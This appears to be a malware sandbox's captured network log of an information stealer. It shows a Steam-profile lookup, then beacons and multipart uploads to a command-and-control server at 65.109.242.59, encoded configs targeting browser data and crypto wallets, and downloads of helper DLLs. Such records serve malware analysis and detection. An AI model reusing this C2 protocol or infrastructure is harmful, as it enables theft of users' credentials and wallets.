                                                          Pragma: no-cache
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7kfn3DuuUJlRGtNbrwrd9desTnoWJi9MpdxjTL%2F2IuYykPx5OThlbRs%2Fuxrlle1KGaY3IivZLd68wFdDiELE%2FNYkOwSYA997iYg9uzeqBrLitRKqt0gxHIqplPDVIvxAHu4fAi57rrLzmLw%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 88a1319919871962-EWR
                                                          alt-svc: h3=":443"; ma=86400


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          8 | 192.168.2.5 | 49746 | 104.102.42.29 | 443 | 1436 | C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2024-05-26 22:27:55 UTC | 119 | OUT | GET /profiles/76561199689717899 HTTP/1.1
                                                          Host: steamcommunity.com
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          2024-05-26 22:27:56 UTC | 1882 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                          Cache-Control: no-cache
                                                          Date: Sun, 26 May 2024 22:27:56 GMT
                                                          Content-Length: 35682
                                                          Connection: close
                                                          Set-Cookie: sessionid=c68514440cebf485dda4dc7c; Path=/; Secure; SameSite=None
                                                          Set-Cookie: steamCountry=US%7C493458b59285f9aa948bf050e0c9a39b; Path=/; Secure; HttpOnly; SameSite=None
                                                          2024-05-26 22:27:56 UTC | 14502 | IN
                                                          Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                          2024-05-26 22:27:56 UTC | 16384 | IN
                                                          Data Ascii: lass="submenuitem" href="https://steamcommunity.com/discussions/">Discussions</a><a class="submenuitem" href="https://steamcommunity.com/workshop/">Workshop</a><a class="sub
                                                          2024-05-26 22:27:56 UTC | 3768 | IN
                                                          Data Ascii: <div class="profile_header_badgeinfo_badge_area"><a data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="persona_level_btn" href="https://steamcommunity.com/profiles/76561199689717899/badges">
                                                          2024-05-26 22:27:56 UTC | 1028 | IN
                                                          Data Ascii: this website is provided by <a href="https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org" target="_blank" rel=" noopener">geonames.org</a>.<br><span class="valve_links"><a href="http://store.steampowered.com/


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          9 | 192.168.2.5 | 49748 | 65.109.242.59 | 443 | 1436 | C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2024-05-26 22:27:57 UTC | 186 | OUT | GET / HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                          Host: 65.109.242.59
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          2024-05-26 22:27:58 UTC | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 26 May 2024 22:27:58 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          2024-05-26 22:27:58 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          10 | 192.168.2.5 | 49750 | 65.109.242.59 | 443 | 1436 | C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2024-05-26 22:28:00 UTC | 278 | OUT | POST / HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----KKJKEBKFCAAECAAAAAEC
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                          Host: 65.109.242.59
                                                          Content-Length: 279
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          2024-05-26 22:28:00 UTC | 279 | OUT
                                                          Data Ascii: ------KKJKEBKFCAAECAAAAAECContent-Disposition: form-data; name="hwid"6E3638B250552186886669-a33c7340-61ca-11ee-8c18-806e6f6e6963------KKJKEBKFCAAECAAAAAECContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------
                                                          2024-05-26 22:28:01 UTC | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 26 May 2024 22:28:00 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          2024-05-26 22:28:01 UTC | 69 | IN | Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 64 32 33 66 61 38 35 36 30 33 62 39 36 66 36 35 63 64 64 64 66 39 30 38 62 35 34 33 65 66 39 61 7c 31 7c 31 7c 31 7c 31 7c 31 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 3a1|1|1|1|d23fa85603b96f65cdddf908b543ef9a|1|1|1|1|1|50000|10


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          11 | 192.168.2.5 | 49751 | 65.109.242.59 | 443 | 1436 | C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2024-05-26 22:28:01 UTC | 278 | OUT | POST / HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----EGIIIECBGDHJJKFIDAKJ
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                          Host: 65.109.242.59
                                                          Content-Length: 331
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          2024-05-26 22:28:01 UTC | 331 | OUT
                                                          Data Ascii: ------EGIIIECBGDHJJKFIDAKJContent-Disposition: form-data; name="token"d23fa85603b96f65cdddf908b543ef9a------EGIIIECBGDHJJKFIDAKJContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------EGIIIECBGDHJJKFIDAKJCont
                                                          2024-05-26 22:28:02 UTC | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 26 May 2024 22:28:02 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          2024-05-26 22:28:02 UTC | 1564 | IN
                                                          Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          12 | 192.168.2.5 | 49752 | 65.109.242.59 | 443 | 1436 | C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2024-05-26 22:28:03 UTC | 278 | OUT | POST / HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----GDBAKEGIDBGIEBFHDHJJ
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                          Host: 65.109.242.59
                                                          Content-Length: 331
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          2024-05-26 22:28:03 UTC | 331 | OUT
                                                          Data Ascii: ------GDBAKEGIDBGIEBFHDHJJContent-Disposition: form-data; name="token"d23fa85603b96f65cdddf908b543ef9a------GDBAKEGIDBGIEBFHDHJJContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------GDBAKEGIDBGIEBFHDHJJCont
                                                          2024-05-26 22:28:04 UTC | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 26 May 2024 22:28:04 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          2024-05-26 22:28:04 UTC | 5605 | IN
                                                          Data Ascii: 15d8TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          13 | 192.168.2.5 | 49753 | 65.109.242.59 | 443 | 1436 | C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2024-05-26 22:28:04 UTC | 278 | OUT | POST / HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----HDBKFHIJKJKECAAAECAE
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                          Host: 65.109.242.59
                                                          Content-Length: 332
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          2024-05-26 22:28:04 UTC | 332 | OUT
                                                          Data Ascii: ------HDBKFHIJKJKECAAAECAEContent-Disposition: form-data; name="token"d23fa85603b96f65cdddf908b543ef9a------HDBKFHIJKJKECAAAECAEContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------HDBKFHIJKJKECAAAECAECont
                                                          2024-05-26 22:28:05 UTC | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 26 May 2024 22:28:05 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          2024-05-26 22:28:05 UTC | 119 | IN
                                                          Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 49754 | 65.109.242.59 | 443 | 1436 | C:\Users\user\AppData\Local\Temp\katA304.tmp
Timestamp | Bytes transferred | Direction | Data
2024-05-26 22:28:06 UTC | 279 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----IJEGHJECFCFCBFIDBGCG
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 65.109.242.59
Content-Length: 5897
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-26 22:28:06 UTC | 5897 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 47 48 4a 45 43 46 43 46 43 42 46 49 44 42 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 33 66 61 38 35 36 30 33 62 39 36 66 36 35 63 64 64 64 66 39 30 38 62 35 34 33 65 66 39 61 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 47 48 4a 45 43 46 43 46 43 42 46 49 44 42 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 47 48 4a 45 43 46 43 46 43 42 46 49 44 42 47 43 47 0d 0a 43 6f 6e 74
Data Ascii: ------IJEGHJECFCFCBFIDBGCGContent-Disposition: form-data; name="token"d23fa85603b96f65cdddf908b543ef9a------IJEGHJECFCFCBFIDBGCGContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------IJEGHJECFCFCBFIDBGCGCont
2024-05-26 22:28:07 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 26 May 2024 22:28:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-05-26 22:28:07 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.5 | 49755 | 65.109.242.59 | 443 | 1436 | C:\Users\user\AppData\Local\Temp\katA304.tmp
Timestamp | Bytes transferred | Direction | Data
2024-05-26 22:28:07 UTC | 194 | OUT | GET /sqls.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 65.109.242.59
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-26 22:28:08 UTC | 248 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 26 May 2024 22:28:08 GMT
Content-Type: application/octet-stream
Content-Length: 2459136
Last-Modified: Fri, 24 May 2024 10:18:21 GMT
Connection: close
ETag: "6650696d-258600"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.5 | 49756 | 65.109.242.59 | 443 | 1436 | C:\Users\user\AppData\Local\Temp\katA304.tmp
Timestamp | Bytes transferred | Direction | Data
2024-05-26 22:28:11 UTC | 278 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----CFIJEBFCGDAAKFHIDBFI
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 65.109.242.59
Content-Length: 829
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-26 22:28:11 UTC | 829 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 43 46 49 4a 45 42 46 43 47 44 41 41 4b 46 48 49 44 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 33 66 61 38 35 36 30 33 62 39 36 66 36 35 63 64 64 64 66 39 30 38 62 35 34 33 65 66 39 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 4a 45 42 46 43 47 44 41 41 4b 46 48 49 44 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 4a 45 42 46 43 47 44 41 41 4b 46 48 49 44 42 46 49 0d 0a 43 6f 6e 74
Data Ascii: ------CFIJEBFCGDAAKFHIDBFIContent-Disposition: form-data; name="token"d23fa85603b96f65cdddf908b543ef9a------CFIJEBFCGDAAKFHIDBFIContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------CFIJEBFCGDAAKFHIDBFICont
2024-05-26 22:28:12 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 26 May 2024 22:28:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-05-26 22:28:12 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.5 | 49758 | 65.109.242.59 | 443 | 1436 | C:\Users\user\AppData\Local\Temp\katA304.tmp
Timestamp | Bytes transferred | Direction | Data
2024-05-26 22:28:12 UTC | 278 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----HIIIECAAKECFHIECBKJD
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 65.109.242.59
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-26 22:28:12 UTC | 437 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 33 66 61 38 35 36 30 33 62 39 36 66 36 35 63 64 64 64 66 39 30 38 62 35 34 33 65 66 39 61 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 0d 0a 43 6f 6e 74
Data Ascii: ------HIIIECAAKECFHIECBKJDContent-Disposition: form-data; name="token"d23fa85603b96f65cdddf908b543ef9a------HIIIECAAKECFHIECBKJDContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------HIIIECAAKECFHIECBKJDCont
2024-05-26 22:28:13 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 26 May 2024 22:28:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-05-26 22:28:13 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.5 | 49759 | 65.109.242.59 | 443 | 1436 | C:\Users\user\AppData\Local\Temp\katA304.tmp
Timestamp | Bytes transferred | Direction | Data
2024-05-26 22:28:13 UTC | 278 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----BGHJJDGHCBGDHIECBGID
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 65.109.242.59
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-26 22:28:13 UTC | 437 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 33 66 61 38 35 36 30 33 62 39 36 66 36 35 63 64 64 64 66 39 30 38 62 35 34 33 65 66 39 61 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 0d 0a 43 6f 6e 74
Data Ascii: ------BGHJJDGHCBGDHIECBGIDContent-Disposition: form-data; name="token"d23fa85603b96f65cdddf908b543ef9a------BGHJJDGHCBGDHIECBGIDContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------BGHJJDGHCBGDHIECBGIDCont
2024-05-26 22:28:14 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 26 May 2024 22:28:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-05-26 22:28:14 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.5 | 49760 | 65.109.242.59 | 443 | 1436 | C:\Users\user\AppData\Local\Temp\katA304.tmp
Timestamp | Bytes transferred | Direction | Data
2024-05-26 22:28:15 UTC | 173 | OUT | GET /freebl3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 65.109.242.59
Cache-Control: no-cache
2024-05-26 22:28:15 UTC | 246 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 26 May 2024 22:28:15 GMT
Content-Type: application/octet-stream
Content-Length: 685392
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: close
ETag: "6315a9f4-a7550"
Accept-Ranges: bytes
                                                          2024-05-26 22:28:15 UTC16384INData Raw: ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5 28 ff ff ff 8b b5 04 ff ff ff 81 e6 ff ff
                                                          Data Ascii: 0<48%8A)$(


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          20 | 192.168.2.5 | 49761 | 65.109.242.59 | 443 | 1436 | C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2024-05-26 22:28:18 UTC | 173 | OUT | GET /mozglue.dll HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                          Host: 65.109.242.59
                                                          Cache-Control: no-cache
                                                          2024-05-26 22:28:19 UTC | 246 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 26 May 2024 22:28:19 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 608080
                                                          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                          Connection: close
                                                          ETag: "6315a9f4-94750"
                                                          Accept-Ranges: bytes


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          21 | 192.168.2.5 | 49762 | 65.109.242.59 | 443 | 1436 | C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2024-05-26 22:28:20 UTC | 174 | OUT | GET /msvcp140.dll HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                          Host: 65.109.242.59
                                                          Cache-Control: no-cache
                                                          2024-05-26 22:28:21 UTC | 246 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 26 May 2024 22:28:21 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 450024
                                                          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                          Connection: close
                                                          ETag: "6315a9f4-6dde8"
                                                          Accept-Ranges: bytes


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          22 | 192.168.2.5 | 49763 | 65.109.242.59 | 443 | 1436 | C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2024-05-26 22:28:22 UTC | 170 | OUT | GET /nss3.dll HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                          Host: 65.109.242.59
                                                          Cache-Control: no-cache
                                                          2024-05-26 22:28:23 UTC | 248 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 26 May 2024 22:28:22 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 2046288
                                                          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                          Connection: close
                                                          ETag: "6315a9f4-1f3950"
                                                          Accept-Ranges: bytes
                                                          Data Ascii: h|D$Fh|$urVd@|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$|$D$pdD$H<@D>D$1V>D$>D$>D$\$hj
                                                          2024-05-26 22:28:23 UTC16384INData Raw: 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d ff ff ff 8b 10 8b 4d e8 83 c4 10 5e 5f 5b 5d
                                                          Data Ascii: HukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-MmM^_[]
